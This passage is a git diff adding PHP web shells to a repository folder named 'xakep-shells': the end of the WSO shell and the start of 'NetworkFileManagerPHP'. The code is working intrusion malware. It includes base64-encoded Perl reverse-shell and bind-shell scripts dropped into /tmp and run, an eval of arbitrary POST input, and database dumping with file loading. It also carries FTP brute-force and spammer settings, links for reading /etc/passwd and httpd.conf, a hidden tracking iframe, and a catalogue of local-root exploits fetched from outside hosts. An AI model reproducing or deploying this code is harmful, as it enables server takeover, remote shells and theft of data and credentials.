+<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
+<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
+<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
+<td><select name='type'><option value='mysql' ";
+    if(@$_POST['type']=='mysql')echo 'selected';
+echo ">MySql</option><option value='pgsql' ";
+if(@$_POST['type']=='pgsql')echo 'selected';
+echo ">PostgreSql</option></select></td>
+<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
+<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
+<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
+	$tmp = "<input type=text name=sql_base value=''>";
+	if(isset($_POST['sql_host'])){
+		if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
+			switch($_POST['charset']) {
+				case "Windows-1251": $db->setCharset('cp1251'); break;
+				case "UTF-8": $db->setCharset('utf8'); break;
+				case "KOI8-R": $db->setCharset('koi8r'); break;
+				case "KOI8-U": $db->setCharset('koi8u'); break;
+				case "cp866": $db->setCharset('cp866'); break;
+			}
+			$db->listDbs();
+			echo "<select name=sql_base><option value=''></option>";
+			while($item = $db->fetch()) {
+				list($key, $value) = each($item);
+				echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
+			}
+			echo '</select>';
+		}
+		else echo $tmp;
+	}else
+		echo $tmp;
+	echo "</td>
+				<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
+                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
+			</tr>
+		</table>
+		<script>
+            s_db='".@addslashes($_POST['sql_base'])."';
+            function fs(f) {
+                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
+                    if(f.p1) f.p1.value='';
+                    if(f.p2) f.p2.value='';
+                    if(f.p3) f.p3.value='';
+                }
+            }
+			function st(t,l) {
+				d.sf.p1.value = 'select';
+				d.sf.p2.value = t;
+                if(l && d.sf.p3) d.sf.p3.value = l;
+				d.sf.submit();
+			}
+			function is() {
+				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
+					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
+			}
+		</script>";
+	if(isset($db) && $db->link){
+		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
+			if(!empty($_POST['sql_base'])){
+				$db->selectdb($_POST['sql_base']);
+				echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
+				$tbls_res = $db->listTables();
+				while($item = $db->fetch($tbls_res)) {
+					list($key, $value) = each($item);
+                    if(!empty($_POST['sql_count']))
+                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
+					$value = htmlspecialchars($value);
+					echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
+				}
+				echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
+				if(@$_POST['p1'] == 'select') {
+					$_POST['p1'] = 'query';
+                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
+					$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
+					$num = $db->fetch();
+					$pages = ceil($num['n'] / 30);
+                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
+                    echo " of $pages";
+                    if($_POST['p3'] > 1)
+                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
+                    if($_POST['p3'] < $pages)
+                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
+                    $_POST['p3']--;
+					if($_POST['type']=='pgsql')
+						$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
+					else
+						$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
+					echo "<br><br>";
+				}
+				if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
+					$db->query(@$_POST['p2']);
+					if($db->res !== false) {
+						$title = false;
+						echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
+						$line = 1;
+						while($item = $db->fetch())	{
+							if(!$title)	{
+								echo '<tr>';
+								foreach($item as $key => $value)
+									echo '<th>'.$key.'</th>';
+								reset($item);
+								$title=true;
+								echo '</tr><tr>';
+								$line = 2;
+							}
+							echo '<tr class="l'.$line.'">';
+							$line = $line==1?2:1;
+							foreach($item as $key => $value) {
+								if($value == null)
+									echo '<td><i>null</i></td>';
+								else
+									echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
+							}
+							echo '</tr>';
+						}
+						echo '</table>';
+					} else {
+						echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
+					}
+				}
+				echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
+                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
+                    echo htmlspecialchars($_POST['p2']);
+                echo "</textarea><br/><input type=submit value='Execute'>";
+				echo "</td></tr>";
+			}
+			echo "</table></form><br/>";
+            if($_POST['type']=='mysql') {
+                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
+                if($db->fetch())
+                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
+            }
+			if(@$_POST['p1'] == 'loadfile') {
+				$file = $db->loadFile($_POST['p2']);
+				echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
+			}
+	} else {
+        echo htmlspecialchars($db->error());
+    }
+	echo '</div>';
+	wsoFooter();
+}
+function actionNetwork() {
+	wsoHeader();
+	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
+	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
+	echo "<h1>Network tools</h1><div class=content>
+	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
+	<span>Bind port to /bin/sh [perl]</span><br/>
+	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form>
+	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
+	<span>Back-connect  [perl]</span><br/>
+	Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form><br>";
+	if(isset($_POST['p1'])) {
+		function cf($f,$t) {
+			$w = @fopen($f,"w") or @function_exists('file_put_contents');
+			if($w){
+				@fwrite($w,@base64_decode($t));
+				@fclose($w);
+			}
+		}
+		if($_POST['p1'] == 'bpp') {
+			cf("/tmp/bp.pl",$bind_port_p);
+			$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
+            unlink("/tmp/bp.pl");
+		}
+		if($_POST['p1'] == 'bcp') {
+			cf("/tmp/bc.pl",$back_connect_p);
+			$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
+            unlink("/tmp/bc.pl");
+		}
+	}
+	echo '</div>';
+	wsoFooter();
+}
+function actionRC() {
+	if(!@$_POST['p1']) {
+		$a = array(
+			"uname" => php_uname(),
+			"php_version" => phpversion(),
+			"wso_version" => WSO_VERSION,
+			"safemode" => @ini_get('safe_mode')
+		);
+		echo serialize($a);
+	} else {
+		eval($_POST['p1']);
+	}
+}
+if( empty($_POST['a']) )
+	if(isset($default_action) && function_exists('action' . $default_action))
+		$_POST['a'] = $default_action;
+	else
+		$_POST['a'] = 'SecInfo';
+if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
+	call_user_func('action' . $_POST['a']);
+exit;
diff --git a/xakep-shells/PHP/xinfo.php.php.txt b/xakep-shells/PHP/xinfo.php.php.txt
new file mode 100644
index 0000000..46778ec
--- /dev/null
+++ b/xakep-shells/PHP/xinfo.php.php.txt
@@ -0,0 +1,4820 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="arabnt@hotmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel ";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* ���� �������� */
+
+$min="1";
+
+$max="39333";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ������ ���������� */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <img src=http://leet.phpnet.us/sh.gif>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (� #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+$public_sites = "http://drakdandy.net/had/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
